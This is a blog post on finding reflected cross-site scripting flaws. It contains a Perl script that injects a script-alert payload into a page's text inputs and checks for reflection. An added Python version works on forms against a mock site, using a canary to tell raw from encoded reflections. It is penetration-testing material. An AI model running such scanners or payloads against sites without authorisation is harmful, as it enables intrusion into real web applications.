Discovering Cross Site Scripting (XSS) vulnerabilities

Posted on Friday 27 January 2012 by Ivano Binetti

Today I wrote a simple Perl script to automatically discover reflected XSS vulnerabilities in a web application: it collects the names of the text inputs on a page, sends a script payload through each one and reports the parameter as vulnerable when the payload comes back unmodified in the response.
The script can be improved to make it more suitable for use in a web penetration test, for example by following each form's action and method instead of appending the parameter to the page URL, and by checking how the payload is reflected (raw or HTML-encoded) rather than only whether it appears.

Here is the code:


#!/usr/bin/perl

use strict;
use warnings;
use LWP::Simple;

my ($webpage, @webpage, @name, $result);

if (@ARGV < 1) {
    usage();
}

# Fetch the web page given on the command line; get() returns undef on failure
$webpage = get("http://" . $ARGV[0]);
unless (defined $webpage) {
    die "Could not fetch http://" . $ARGV[0] . "\n";
}

# Split the page into lines
@webpage = split(/\n/, $webpage);

# Parse the page to collect the names of 'input type="text"' fields
# (only this attribute order, with double quotes, is recognised)
foreach (@webpage) {
    if ($_ =~ /input\stype="text"\sname="(\w{1,30})"/) {
        push(@name, $1);
    }
}

# Print the search boxes found
if (@name) {
    print "I've found the following search box:\n";
    foreach (@name) {
        print "$_\n";
    }
    print "and I've discovered that:\n";

    # Send the payload through each search box and check whether it is
    # reflected unmodified in the response
    foreach (@name) {
        $result = get("http://" . $ARGV[0] . "?" . $_ . "=<script>alert('test_XSS')</script>");
        if (!defined $result) {
            print "$_: request failed\n";
        }
        elsif ($result =~ /<script>alert\('test_XSS'\)<\/script>/) {
            print "$_ is vulnerable to XSS\n";
        }
        else {
            print "$_ isn't vulnerable to XSS\n";
        }
    }
}
else {
    print "I have not found search boxes in " . $ARGV[0] . "\n";
}

# No prototype: usage() is called before this definition
sub usage {
    print "Usage: " . $0 . " <url>\n";
    print "Example: " . $0 . " ivanobinetti.com\n";
    exit;
}
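The same three steps (harvest inputs, inject, check the reflection) with the improvements mentioned above, as an added example in Python rather than the author's Perl. This is not the original script: it parses each form's action and method so POST forms and hidden inputs are covered, uses a random per-parameter canary so a reflection can be attributed to one input, and distinguishes a raw reflection from an HTML-encoded one. The `mock_fetch` function and the `example.test` host are a constructed stand-in for a web server so the example runs offline; `urllib_fetch` is the fetcher you would pass for a live target.

```python
"""Reflected-XSS probe: harvest form inputs, send a per-parameter canary,
and judge how the server reflects it.  Added example, not the page's script."""
import html
import secrets
import urllib.request
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode, urljoin, urlsplit


class FormParser(HTMLParser):
    """Collects every <form> with its resolved action, method and input names."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": urljoin(self.base_url, a.get("action") or ""),
                "method": (a.get("method") or "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            itype = (a.get("type") or "text").lower()
            name = a.get("name")
            if name and itype in ("text", "search", "hidden", "url", "email"):
                self._current["inputs"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def harvest_forms(page_html, base_url):
    parser = FormParser(base_url)
    parser.feed(page_html)
    return parser.forms


def probe_param(fetch, form, param, canary=None):
    """Put the canary in `param` (other inputs get a neutral value) and classify
    the response: the metacharacters must survive for the reflection to matter."""
    canary = canary or "xss" + secrets.token_hex(4)
    marker = f'"<{canary}>'  # quote and angle brackets break out of attr/body
    data = {n: (marker if n == param else "a") for n in form["inputs"]}
    if form["method"] == "post":
        body = fetch(form["action"], data=urlencode(data).encode())
    else:
        body = fetch(form["action"] + "?" + urlencode(data))
    if marker in body:
        return "reflected-raw"        # exploitable in an HTML body context
    if canary in body:
        return "reflected-encoded"    # reflected, but " < > were neutralised
    return "not-reflected"


def scan(fetch, base_url):
    """Return {(form action, input name): verdict} for every harvested input."""
    results = {}
    for form in harvest_forms(fetch(base_url), base_url):
        for param in form["inputs"]:
            results[(form["action"], param)] = probe_param(fetch, form, param)
    return results


def urllib_fetch(url, data=None):
    """Fetcher for a live target (not used by the offline demo below)."""
    with urllib.request.urlopen(url, data=data, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed sample site: /search reflects q raw (vulnerable) and lang
# HTML-escaped (safe); /contact is a POST form that escapes its input.
PAGE = """<html><body>
<form action="/search" method="get">
  <input type="text" name="q">
  <input type="hidden" name="lang" value="en">
  <input type="submit" value="Go">
</form>
<form action="/contact" method="post">
  <input type="text" name="email">
</form>
</body></html>"""


def mock_fetch(url, data=None):
    parts = urlsplit(url)
    params = parse_qs(data.decode()) if data is not None else parse_qs(parts.query)
    get = lambda k: params.get(k, [""])[0]
    if parts.path == "/search":
        return f"<p>Results for {get('q')} ({html.escape(get('lang'))})</p>"
    if parts.path == "/contact":
        return f"<p>Thanks, {html.escape(get('email'))}</p>"
    return PAGE


if __name__ == "__main__":
    for (action, param), verdict in scan(mock_fetch, "http://example.test/").items():
        print(f"{action} {param}: {verdict}")
```

Against the constructed site this reports `q` as `reflected-raw` and `lang` and `email` as `reflected-encoded`. An encoded reflection is not a finding in the HTML body, but it is worth keeping in the report: the same value may land unencoded in a JavaScript string or an event-handler attribute elsewhere, which a body-only check like this one cannot see.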